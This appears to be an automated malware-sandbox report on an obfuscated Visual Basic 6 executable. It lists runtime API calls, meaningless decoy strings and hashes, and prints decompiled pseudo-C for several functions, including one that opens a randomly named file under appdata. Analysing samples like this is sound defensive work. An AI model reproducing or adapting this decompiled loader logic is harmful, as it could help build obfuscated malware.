__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 004202B1
__vbaNew2.MSVBVM60(0040257C,004233C0,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 004202CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014), ref: 0042032E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,000000C0), ref: 0042038D
__vbaFreeObj.MSVBVM60(00000000,?,0040258C,000000C0), ref: 004203AF
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 004203CD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004203E0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004203ED
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 00420407
#525.MSVBVM60(000000B1,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 00420423
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 0042042D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 00420433
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 00420441
#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 0042044B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 00420460
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025A0,00000002), ref: 0042046D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025A0,00000002), ref: 00420473
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025A0,00000002), ref: 00420487
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025A0,00000002), ref: 0042048F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204EA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204F4
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204FA
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042050F
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420517
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042056C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004205AE
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004205C3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004205F8
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042060D
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420638
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420642
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420648
__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420652
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042065A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420662
__vbaFreeStr.MSVBVM60(004206EA,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 004206B5
__vbaFreeStr.MSVBVM60(004206EA,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 004206BD
__vbaFreeStr.MSVBVM60(004206EA,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 004206C5
__vbaAryDestruct.MSVBVM60(00000000,?,004206EA,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 004206DC
__vbaFreeStr.MSVBVM60(00000000,?,004206EA,?,?,?,?,004025A0,00000002,?,?,?,?,00401546), ref: 004206E4

Strings

:, xrefs: 004203B4
BESMUDSES, xrefs: 0042062F
MINESTRYGNING, xrefs: 00420446
Jiggerens, xrefs: 0042019A
UNINTERMITTEDLY, xrefs: 004203C8
PREHISTORICS, xrefs: 00420236
Suppositoriets, xrefs: 00420567
2:2:2, xrefs: 00420457
Rappees, xrefs: 00420195

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 553eb904616d126f36675db6f9684efed8a02f38fd292131181447b616bfb9e4
Instruction ID: 2031d15c749b9be3cec87cc9229ffc07af96e7c932a6823aa11d358f6c1bf7ec
Opcode Fuzzy Hash: 553eb904616d126f36675db6f9684efed8a02f38fd292131181447b616bfb9e4
Instruction Fuzzy Hash: DB027E71940218ABDB14EBA0DC96FEDB7B8BF04304F10856FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE8C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041DE8C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v64;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v148;
				short _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				short _t78;
				signed int _t79;
				char* _t83;
				char* _t88;
				signed int _t99;
				signed int _t104;
				intOrPtr _t132;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				L00401540();
				_v12 = _t132;
				_v8 = 0x401270;
				_push(L"Scopiformly9");
				_push(L"baadene");
				_push( &_v64); // executed
				L00401732(); // executed
				_v104 = L"Ambulancesagen2";
				_v112 = 0x8008;
				_push( &_v64);
				_t78 =  &_v112;
				_push(_t78);
				L00401738();
				_v152 = _t78;
				L00401828();
				_t79 = _v152;
				if(_t79 != 0) {
					_push(0x1b);
					_push(L"Reklamekampagne4");
					L00401750();
					L0040183A();
					if( *0x4233c0 != 0) {
						_v172 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v172 = 0x4233c0;
					}
					_v152 =  *_v172;
					_t99 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t99;
					if(_v156 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v152);
						_push(_v156);
						L004017C8();
						_v176 = _t99;
					}
					_v160 = _v48;
					_t104 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t104;
					if(_v164 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x40258c);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v180 = _t104;
					}
					_t79 = _v148;
					_v40 = _t79;
					L004017C2();
				}
				L004017B6();
				_push(0x44);
				_push(_v36);
				L00401750();
				L0040183A();
				_push(_t79);
				_push(L"Jordfstedes4");
				L0040172C();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~_t79));
				L00401846();
				_t83 = _v152;
				if(_t83 != 0) {
					_v104 = L"appdata";
					_v112 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L0040171A();
					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t88 =  &_v96;
					_push(_t88);
					L00401720();
					_push(_t88);
					L00401834();
					L0040183A();
					_push(_t88);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v32);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0xec);
					_push( &_v64);
					L00401708();
					_t83 =  &_v64;
					_push(_t83);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(0x41e178);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t83;
			}

0x0041de91
0x0041de9c
0x0041de9d
0x0041dea9
0x0041deb1
0x0041deb4
0x0041debb
0x0041dec0
0x0041dec8
0x0041dec9
0x0041dece
0x0041ded5
0x0041dedf
0x0041dee0
0x0041dee3
0x0041dee4
0x0041dee9
0x0041def3
0x0041def8
0x0041df01
0x0041df07
0x0041df09
0x0041df0e
0x0041df18
0x0041df24
0x0041df41
0x0041df26
0x0041df26
0x0041df2b
0x0041df30
0x0041df35
0x0041df35
0x0041df53
0x0041df6b
0x0041df6e
0x0041df70
0x0041df7d
0x0041df9f
0x0041df7f
0x0041df7f
0x0041df81
0x0041df86
0x0041df8c
0x0041df92
0x0041df97
0x0041df97
0x0041dfa9
0x0041dfc4
0x0041dfca
0x0041dfcc
0x0041dfd9
0x0041dffe
0x0041dfdb
0x0041dfdb
0x0041dfe0
0x0041dfe5
0x0041dfeb
0x0041dff1
0x0041dff6
0x0041dff6
0x0041e005
0x0041e00c
0x0041e013
0x0041e013
0x0041e020
0x0041e025
0x0041e027
0x0041e02a
0x0041e034
0x0041e039
0x0041e03a
0x0041e03f
0x0041e046
0x0041e04c
0x0041e056
0x0041e05b
0x0041e064
0x0041e06a
0x0041e071
0x0041e07e
0x0041e086
0x0041e08a
0x0041e08b
0x0041e090
0x0041e097
0x0041e0a1
0x0041e0a5
0x0041e0a6
0x0041e0a9
0x0041e0aa
0x0041e0af
0x0041e0b0
0x0041e0ba
0x0041e0bf
0x0041e0c0
0x0041e0c2
0x0041e0c4
0x0041e0c9
0x0041e0d1
0x0041e0d9
0x0041e0dd
0x0041e0e1
0x0041e0e2
0x0041e0e4
0x0041e0ec
0x0041e0f1
0x0041e0f2
0x0041e0f4
0x0041e0f9
0x0041e0fb
0x0041e100
0x0041e108
0x0041e109
0x0041e10e
0x0041e111
0x0041e112
0x0041e11c
0x0041e124
0x0041e124
0x0041e129
0x0041e15a
0x0041e162
0x0041e16a
0x0041e172
0x0041e177

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041DEA9
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041DEC9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041DEE4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041DEF3
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DF0E
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DF18
__vbaNew2.MSVBVM60(0040257C,004233C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041DF30
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DF92
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DFF1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041E013
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041E020
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041E02A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041E034
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E03F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E056
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E07E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E08B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E0AA
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E0B0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E0BA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E0C9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E0D1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041E0E4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041E0F4
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041E0FB
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041E109
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E112
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E11C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E124
__vbaFreeStr.MSVBVM60(0041E178,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E15A
__vbaFreeStr.MSVBVM60(0041E178,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E162
__vbaFreeStr.MSVBVM60(0041E178,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E16A
__vbaFreeStr.MSVBVM60(0041E178,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E172

Strings

appdata, xrefs: 0041E06A
Scopiformly9, xrefs: 0041DEBB
baadene, xrefs: 0041DEC0
CONTINUATOR, xrefs: 0041E018
Reklamekampagne4, xrefs: 0041DF09
Jordfstedes4, xrefs: 0041E03A
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041E090
Ambulancesagen2, xrefs: 0041DECE

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: e4c34d3525dc537e167d2a71d52714b65a5e67257cbcb124d92ce72552e0c43f
Instruction ID: 7a38cc04581d5287dc613327fa22871a20026923e8683a44f71bca11478e91f8
Opcode Fuzzy Hash: e4c34d3525dc537e167d2a71d52714b65a5e67257cbcb124d92ce72552e0c43f
Instruction Fuzzy Hash: 0F71FA71E00218AADB14EBA1CC46FDEB7B8AF05704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420874, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00420874(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _v52;
				char _v56;
				void* _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				char* _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _t182;
				signed int _t207;
				char* _t208;
				signed int _t219;
				char* _t221;
				signed int _t223;
				signed int _t229;
				void* _t231;
				signed int _t234;
				char* _t239;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t259;
				void* _t261;
				void* _t263;
				void* _t273;
				void* _t282;
				void* _t284;
				intOrPtr _t285;
				void* _t286;

				_t285 = _t284 - 0x18;
				 *[fs:0x0] = _t285;
				L00401540();
				_v28 = _t285;
				_v24 = 0x4013f0;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t282);
				_v8 = 1;
				_v8 = 2;
				_v68 = 0x4fdf6b;
				_v76 = 3;
				_push( &_v76);
				_push( &_v92);
				L0040160C();
				_push( &_v92);
				_push( &_v108);
				L004016BA();
				_v148 = L"FOSTERET";
				_v156 = 0x8008;
				_push( &_v108);
				_t182 =  &_v156;
				_push(_t182);
				L004016AE();
				_v160 = _t182;
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401840();
				_t286 = _t285 + 0x10;
				if(_v160 != 0) {
					_v8 = 3;
					if( *0x4233c0 != 0) {
						_v196 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v196 = 0x4233c0;
					}
					_v160 =  *_v196;
					_t229 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v60);
					asm("fclex");
					_v164 = _t229;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v200 = _t229;
					}
					_v168 = _v60;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_t231 = 0x10;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004016B4();
					L0040183A();
					_t234 =  *((intOrPtr*)( *_v168 + 0x13c))(_v168, _t231, 0x5e4c2e);
					asm("fclex");
					_v172 = _t234;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x40258c);
						_push(_v168);
						_push(_v172);
						L004017C8();
						_v204 = _t234;
					}
					L00401846();
					L004017C2();
					_v8 = 4;
					_v68 = 0x16;
					_v76 = 2;
					_push( &_v76);
					_push( &_v92);
					L00401606();
					_v100 = 0xb8;
					_v108 = 2;
					_push( &_v108);
					_push(0xa1);
					_push( &_v92);
					_t239 =  &_v56;
					_push(_t239);
					L00401858();
					_push(_t239);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push(3);
					L00401840();
					_t286 = _t286 + 0x10;
				}
				_v8 = 6;
				_push(0);
				_push(9);
				_push(1);
				_push(3);
				_push( &_v48);
				_push(4);
				_push(0x80);
				L00401600();
				_v8 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x27c30;
				_v8 = 8;
				_t246 = 1;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t246 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x94a0c;
				_v8 = 9;
				_t248 = 2;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t248 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2164a4;
				_v8 = 0xa;
				_t250 = 3;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t250 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5d9b94;
				_v8 = 0xb;
				_t252 = 4;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t252 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5a7363;
				_v8 = 0xc;
				_t254 = 5;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t254 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2787b7;
				_v8 = 0xd;
				_v68 =  *0x40146c;
				_v76 = 4;
				_push( &_v92);
				_t207 =  &_v76;
				_push(_t207);
				L004017A4();
				_v160 = _t207;
				if(_v160 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(_v160);
					L0040179E();
					_v208 = _t207;
				}
				_t208 =  &_v92;
				_push(_t208);
				L0040178C();
				_t273 = 6;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t273 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t208;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L00401840();
				_v8 = 0xe;
				_t259 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t259 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x37e4a9;
				_v8 = 0xf;
				_t261 = 8;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t261 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x84c244;
				_v8 = 0x10;
				_t263 = 9;
				_t219 =  *(_v48 + 0xc);
				 *((intOrPtr*)(_t219 + (_t263 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x635cea;
				_v8 = 0x11;
				if((_t219 | 0xffffffff) != 0) {
					_v8 = 0x12;
					_v44 = 0x29c1aa;
					_v8 = 0x13;
					_t223 = _v44 ^ 0x0018dd5b;
					_v44 = _t223;
					_v8 = 0x14;
					_push(0xffffffff);
					L004016E4();
					_v8 = 0x15;
					_push(0x3ed0fd);
					L004016B4();
					L0040183A();
					_push(_t223); // executed
					L004015FA(); // executed
					_v40 = _t223;
					L00401846();
				}
				asm("wait");
				_push(0x420d38);
				_t221 =  &_v48;
				_push(_t221);
				_push(0);
				L0040173E();
				L00401846();
				return _t221;
			}

0x00420877
0x00420886
0x00420892
0x0042089a
0x0042089d
0x004208a4
0x004208ab
0x004208ba
0x004208bd
0x004208c4
0x004208cb
0x004208d2
0x004208dc
0x004208e0
0x004208e1
0x004208e9
0x004208ed
0x004208ee
0x004208f3
0x004208fd
0x0042090a
0x0042090b
0x00420911
0x00420912
0x00420917
0x00420921
0x00420925
0x00420929
0x0042092a
0x0042092c
0x00420931
0x0042093d
0x00420943
0x00420951
0x0042096e
0x00420953
0x00420953
0x00420958
0x0042095d
0x00420962
0x00420962
0x00420980
0x00420998
0x0042099b
0x0042099d
0x004209aa
0x004209cc
0x004209ac
0x004209ac
0x004209ae
0x004209b3
0x004209b9
0x004209bf
0x004209c4
0x004209c4
0x004209d6
0x004209dc
0x004209e3
0x004209ef
0x004209f0
0x004209fd
0x004209fe
0x004209ff
0x00420a00
0x00420a06
0x00420a10
0x00420a24
0x00420a2a
0x00420a2c
0x00420a39
0x00420a5e
0x00420a3b
0x00420a3b
0x00420a40
0x00420a45
0x00420a4b
0x00420a51
0x00420a56
0x00420a56
0x00420a68
0x00420a70
0x00420a75
0x00420a7c
0x00420a83
0x00420a8d
0x00420a91
0x00420a92
0x00420a97
0x00420a9e
0x00420aa8
0x00420aa9
0x00420ab1
0x00420ab2
0x00420ab5
0x00420ab6
0x00420abb
0x00420abc
0x00420ac6
0x00420ace
0x00420ad6
0x00420ada
0x00420ade
0x00420adf
0x00420ae1
0x00420ae6
0x00420ae6
0x00420ae9
0x00420af0
0x00420af2
0x00420af4
0x00420af6
0x00420afb
0x00420afc
0x00420afe
0x00420b03
0x00420b0b
0x00420b20
0x00420b27
0x00420b33
0x00420b3d
0x00420b44
0x00420b50
0x00420b5a
0x00420b61
0x00420b6d
0x00420b77
0x00420b7e
0x00420b8a
0x00420b94
0x00420b9b
0x00420ba7
0x00420bb1
0x00420bb8
0x00420bc5
0x00420bc8
0x00420bd2
0x00420bd3
0x00420bd6
0x00420bd7
0x00420bdc
0x00420be9
0x00420bfe
0x00420beb
0x00420beb
0x00420bf1
0x00420bf6
0x00420bf6
0x00420c05
0x00420c08
0x00420c09
0x00420c13
0x00420c1d
0x00420c23
0x00420c27
0x00420c28
0x00420c2a
0x00420c32
0x00420c3e
0x00420c48
0x00420c4f
0x00420c5b
0x00420c65
0x00420c6c
0x00420c78
0x00420c7f
0x00420c82
0x00420c89
0x00420c95
0x00420c97
0x00420c9e
0x00420ca5
0x00420caf
0x00420cb4
0x00420cb7
0x00420cbe
0x00420cc0
0x00420cc5
0x00420ccc
0x00420cd1
0x00420cdb
0x00420ce0
0x00420ce1
0x00420ce6
0x00420cec
0x00420cec
0x00420cf1
0x00420cf2
0x00420d24
0x00420d27
0x00420d28
0x00420d2a
0x00420d32
0x00420d37

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420892
#575.MSVBVM60(?,00000003), ref: 004208E1
#518.MSVBVM60(?,?,?,00000003), ref: 004208EE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420912
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042092C
__vbaNew2.MSVBVM60(0040257C,004233C0,?,?,?,00401546), ref: 0042095D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014), ref: 004209BF
__vbaChkstk.MSVBVM60(00000000,?,0040256C,00000014), ref: 004209F0
__vbaStrI4.MSVBVM60(005E4C2E), ref: 00420A06
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420A10
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000013C), ref: 00420A51
__vbaFreeStr.MSVBVM60(00000000,?,0040258C,0000013C), ref: 00420A68
__vbaFreeObj.MSVBVM60(00000000,?,0040258C,0000013C), ref: 00420A70
#573.MSVBVM60(?,00000002), ref: 00420A92
__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 00420AB6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 00420ABC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 00420AC6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 00420ACE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 00420AE1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420B03
#564.MSVBVM60(00000004,?), ref: 00420BD7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420BF1
__vbaI4Var.MSVBVM60(?), ref: 00420C09
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 00420C2A
__vbaOnError.MSVBVM60(000000FF), ref: 00420CC0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 00420CD1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 00420CDB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420CE1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420CEC
__vbaAryDestruct.MSVBVM60(00000000,?,00420D38), ref: 00420D2A
__vbaFreeStr.MSVBVM60(00000000,?,00420D38), ref: 00420D32

Strings

FOSTERET, xrefs: 004208F3

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: c9f2d80d280a8eb097381b766fd8a0d507d4f1aaa8dcd4d55b777687fbd737f2
Instruction ID: 2b3bc37bd30941860e67d9211f512572b62c310ca236bdc6ad432fbb5d2086be
Opcode Fuzzy Hash: c9f2d80d280a8eb097381b766fd8a0d507d4f1aaa8dcd4d55b777687fbd737f2
